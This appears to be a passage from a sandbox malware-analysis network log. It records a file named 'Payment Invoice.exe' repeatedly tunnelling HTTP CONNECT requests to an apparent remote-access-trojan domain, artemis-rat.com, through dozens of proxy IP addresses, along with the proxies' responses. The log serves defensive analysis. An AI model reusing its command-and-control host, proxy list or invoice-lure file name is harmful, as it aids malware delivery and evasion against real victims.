                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1579192.168.2.4527281.15.62.1256787076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.564718962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1580192.168.2.454795103.188.168.6680807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.564837933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1581192.168.2.454804104.248.151.220609157076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.565803051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.323852062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.324230909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.323839903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1582192.168.2.454882104.18.220.95807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.568572044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.724426985 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1583192.168.2.454086119.196.168.183807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.708174944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1584192.168.2.45476713.234.24.11631287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.709744930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.101007938 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1585192.168.2.449885105.174.40.5480807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.710762024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.196902037 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1586192.168.2.450017148.72.23.56600697076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.713018894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1587192.168.2.454097146.19.106.217123347076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.713443041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1588192.168.2.454901162.247.243.167807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.714111090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.875155926 CET159INHTTP/1.1 400 Bad Request
                                                                Connection: close
                                                                Content-Length: 15
                                                                content-type: text/plain; charset=utf-8
                                                                x-served-by: cache-lax-kwhp1940052
                                                                Data Raw: 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74
                                                                Data Ascii: invalid request


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1589192.168.2.452696176.235.139.33100017076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.715915918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.715384960 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1590192.168.2.454674122.114.232.1378087076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.716007948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1591192.168.2.454907138.68.60.880807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.716135979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.139064074 CET28INHTTP/1.1 400 Bad Request


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1592192.168.2.449986161.97.163.52551097076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.716794968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1593192.168.2.452729185.104.63.5631287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.717762947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.823854923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:51.119071960 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1594192.168.2.45484223.137.248.197807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.720649958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1595192.168.2.454815111.90.150.10910807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.724311113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1596192.168.2.452714130.255.162.199203987076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.725241899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.823892117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.824323893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.824120998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:45.823575974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:57.823596001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:09.823719025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:33.823604107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:21.823889017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1597192.168.2.452667109.86.182.20331287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.725490093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.823832035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.824327946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.824114084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:36.251982927 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1598192.168.2.45484349.13.131.163807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.725763083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1599192.168.2.454832177.38.5.1641537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.726811886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1600192.168.2.454172166.62.38.100322167076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.730884075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.823889971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.824275970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.824135065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:45.823581934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1601192.168.2.454093103.174.178.13310207076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.732175112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1602192.168.2.45272086.110.189.15441457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.732234955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1603192.168.2.454834119.91.214.11933897076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.732651949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1604192.168.2.454896184.185.2.1241457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.732723951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1605192.168.2.452786177.184.67.3341457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.733556986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1606192.168.2.45411949.254.240.252210287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.733640909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.490880013 CET39INHTTP/1.0 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1607192.168.2.45282545.226.1.141537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.733712912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1608192.168.2.449960148.72.209.174124467076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.733871937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.776963949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.886723042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.980114937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:46.089319944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:58.089246035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:10.089303970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1609192.168.2.45488058.234.116.19781937076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.736954927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1610192.168.2.45409593.157.248.108887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.745052099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1611192.168.2.45489337.235.53.20867897076C:\Users\user\Desktop\Payment Invoice.exe
